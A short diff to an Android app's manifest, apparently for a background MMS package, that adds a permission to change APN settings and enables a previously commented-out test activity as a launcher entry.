--- a/AndroidManifest.xml
+++ b/AndroidManifest.xml
@@ -29,6 +29,7 @@
     <uses-permission android:name="android.permission.WAKE_LOCK" />
     <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
     <uses-permission android:name="android.permission.INTERNET"/>
+    <uses-permission android:name="android.permission.WRITE_APN_SETTINGS" />
     <!-- uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" / -->
 
 	<uses-sdk android:minSdkVersion="4"/>
@@ -38,7 +39,7 @@
             android:taskAffinity="android.task.mms"
             android:allowTaskReparenting="true">
 
-       <!-- activity android:name=".ui.TestActivity"
+       <activity android:name=".ui.TestActivity"
                   android:label="@string/app_name"
                   android:configChanges="orientation|keyboardHidden"
                   android:launchMode="singleTop">
@@ -47,7 +48,7 @@
                 <category android:name="android.intent.category.LAUNCHER" />
                 <category android:name="android.intent.category.DEFAULT" />
             </intent-filter>
-        </activity -->
+        </activity>
         
 		<!-- activity android:name="com.mms.bg.ui.DialScreenActivity"
                   android:label="@string/app_name"
